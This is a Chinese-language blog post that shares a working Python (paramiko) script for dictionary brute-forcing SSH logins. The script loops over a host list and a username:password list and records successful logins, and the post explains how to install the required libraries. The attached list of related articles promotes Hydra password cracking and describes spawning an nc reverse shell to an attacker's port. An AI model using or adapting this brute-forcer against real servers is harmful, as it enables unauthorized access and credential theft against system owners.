python字典爆破_EnumSSH字典爆破SSH

最新推荐文章于 2024-04-18 09:24:34 发布
最新推荐文章于 2024-04-18 09:24:34 发布
阅读量573 收藏
点赞数
文章标签: python字典爆破
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39597868/article/details/111437172
版权

Finished 2015/03/23 by Robot [blog.sec-lab.org]

由于工作需要,利用python编写了SSH的字典爆破的小 程序,这里分享给大家.

由于很多情况下python默认没有安装paramiko模块,这里顺带说下我的安装方法把:

Python中使用SSH需要用到OpenSSH,而OpenSSH依赖于paramiko模块,而paramiko模块又依赖于pycrypto模块,因此要在Python中使用SSH,则需要先安装模块顺序是:

pycrypto -> ecdsa -> paramiko

1.pyCrypto

现在比较幸运,官方已经发布了针对python各个版本的Window版本了,直接下载安装msi就行,地址:http://www.voidspace.org.uk/python/modules.shtml#pycrypto

2.ecdsa

ecdsa官网,下载完后解压,进入目录执行

python setup.py install

3.paramiko

最后安装这个和安装ecdsa一样,这里不废话,给链接paramiko下载

#-*- coding: utf-8 -*-

#!/usr/bin/python

import paramiko

import time

import os

import threading

def WriteLogToFile(logtxt):

LogFile ="success.txt"

hwrite=open(LogFile,'a')

log=("%s %s\r\n" % (time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())),logtxt))

hwrite.write(log)

hwrite.close()

def ConnSSH(Host,Port,Username,Pass):

ssh = paramiko.SSHClient()

try:

paramiko.util.log_to_file('ssh.log')

ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

ssh.connect(Host,Port,Username,Pass,timeout=5)

stdin,stdout,stderr=ssh.exec_command('exit')

print stdout.read()

Logstr=("[+]Login [%s] With %s:%s Success!\n"%(Host,User,Pass))

WriteLogToFile(Logstr)

return True

except Exception as e:

Logstr=("[-]Login [%s] With %s:%s,%s\n"%(Host,User,Pass,e))

print Logstr

ssh.close()

return False

if __name__=='__main__':

HostFile = "host.txt"

UserPassFile = "up.txt"

Port = 22

########################

#Test Data

#Username = "root"

#Pass = "password"

#Host="127.0.0.1"

########################

hHostFile = open(HostFile)

ArrayHosts = hHostFile.readlines()

hHostFile.close()

hUPFile = open(UserPassFile)

ArrayUserPass = hUPFile.readlines()

hUPFile.close()

for Host in ArrayHosts:

Host = Host.strip('\n')

for UserPass in ArrayUserPass:

arr = UserPass.split(":")

User = arr[0]

Pass = arr[1].strip('\n')

# start Connect SSH

if ConnSSH(Host,Port,User,Pass) == True :

break

#HThread = threading.Thread(target=ConnSSH,args=(Host,Port,User,Pass));

#HThread.start()

weixin_39597868
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
爆破字典
02-21
服务器爆破的强大字典
kali之ssh超级爆破字典自动生成。
Afghanis的博客
05-12 6439
利用kali渗透工具对服务器,个人电脑等进行ssh爆破ssh默认端口一般是22端口。
网络安全——SSH密码攻击实验_手动创建用户名字典和密码字典 登录主机1,打开terminal终端,执行命令vi users(1)
m0_60707685的博客
04-07 571
3、根据Hydra工具的作用:用此工具进行暴力破解,可在线破解多种密码。结合相关攻击协议、模块进行破解,如协议AFP、CVS、FTP等。并提供多种登录机制。此工具操作简单,提供图形化界面。4、根据SSH、FTP协议的特点,ssh是securety shell(安全外壳协议)的缩写,是一种网络协议,作用是用于计算机之间的加密登录;FTP协议提供交互式的访问,允许客户指定存储文件的类型与格式,具备鉴别控制能力,屏蔽了计算机系统的细节。本实验将使用Hydra对SSH和FTP协议进行密码破解。
Linux下hydra的使用
Tobiubiu
07-25 1848
Syntax:  hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] Parameter: -R 继续从上一次进度接着破解 -S 大写,采
SSH端口爆破及其应急响应方案
m0_58540923的博客
07-26 1650
Secure Shell (安全外壳协议,简称SSH) 是一种加密的网络传输协议;用途:安全远程登录;可帮助我们在windows下去连接并操作linux服务器。常见的SSH客户端有putty、SSH Secure Shell、MobaXterm 、Xshell等;常用端口:22爆破时间、爆破用户、攻击者ip、攻击方式。
ssh转发.tar_pythonssh_python_ssh2_
09-29
python ssh资料 手册 转发 隧道 远程执行命令 监控 登陆 免密
python字典生成
07-28
字典生成
1.0.py_python_ssh_邮件_
10-03
一个Email to SSH软件,发送邮件控制服务器行动
重构Python_OMP字典_omp_
09-30
OMP 算法是在 MP 算法的基础上进行改进的,其挑选原子的标准和 MP 算法一致,也就是在训练字典A里挑选和测试样本x最为匹配的字典原子
ssh_linux.zip_beyond3rl_python_ssh_进程
09-21
利用ssh连接远程Linux服务器获得目标服务器的进程信息
爆破常用密码自己用的
09-03
ssh爆破密码,网上下载了很多,但是没报成功,这里自己找的,自己做测试用的。就 像评论里讲的,数量不多,注意下啊。
漏洞复现篇:ssh爆破
最新发布
m0_65615852的博客
04-18 931
漏洞复现篇:ssh爆破(非常详细的ssh爆破过程)
服务器SSH字典爆破时记录密码
辰流的博客
11-11 1822
服务器SSH字典爆破时记录对方使用的密码 事情的起因是这样的:本人购(bai)买(piao)了一台华为云的云主机,有一天登录的时候日常查看安全日志,发现有人在用字典爆破ssh登录的用户名和密码,奈何我早就做了安全加固(更改ssh端口、禁止root用户登录、使用fail2ban)对方并没有成功。由于我端口选的过于随机,用户名足够偏,密码强度足够,便放任他爆破。过了一个月发现还在继续,感叹对方执着的同时突然想到:这不正是一个构建自己密码字典的好机会吗?瞬间感觉自己错过了一个亿…迄今为止对方可是已经尝试了四十
Hydra密码爆破工具使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
m0_61869253的博客
09-07 3199
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
使用hydra进行SSH爆破
qq_53218512的博客
06-02 4942
mobaxterm 的功能非常全面,几乎提供了所有重要的远程网络工具(比如 SSH、X11、RDP、VNC、FTP、MOSH 等),以及 Windows 桌面上的 Unix 命令(bash、ls、cat、sed、grep、awk、rsync 等),登录之后默认开启 sftp 模式。命令的意思是:使用bin.bash里面的shell,用nc命令反弹shell,反弹到攻击机的7777端口,-e代表需要执行的指令,这里是要执行/bin/bash。发现通过计划任务执行了bash/tmp下面的task.sh文件。
SSH密码暴力破解
Marsper的博客
11-16 3542
SSH密码暴力破解 海德拉( Hydra ):希腊神话中的九头蛇,是西方的神话生物,在古希暗神话中出现最为频繁。传说它拥有九颗头,其中一颗头要是被斩断,立刻又会生出两颗头来。 hydra 是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。 1.1指定用户破解 打开kali虚拟机 输入hydra -h 查看帮助 Examples: hydra -l user -P passlist.txt ftp
kali机中ssh远程登陆实验与提权及cewl字典抓取与hydra密码爆破
2er0!=O的博客
12-28 1840
实验环境 虚拟机IP为192.168.56.110 使用nmap扫描改虚拟机存在的端口,可以发现存在ssh端口 nmap 192.168.56.110 cewl字典抓取 使用cewl工具,先了解去命令类型 cewl --h 获取字典,并将其存放,将抓取的字典放到自定义的一个txt中 cewl http://192.168.56.110 -w fuck.txt 检查获取的字典,并查看字典内容 cat fuck.txt hydra密码爆破ssh端口对字典进行密码爆破(使用hydra工具) hyd
python ssh 爆破_ssh爆破(python脚本)
05-16
SSH爆破是指通过尝试不同的用户名和密码组合来破解SSH服务的登录密码,以下是一个简单的Python脚本实现SSH爆破: ```python import paramiko import sys # 定义需要尝试的用户名和密码列表 usernames = ['root'] ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值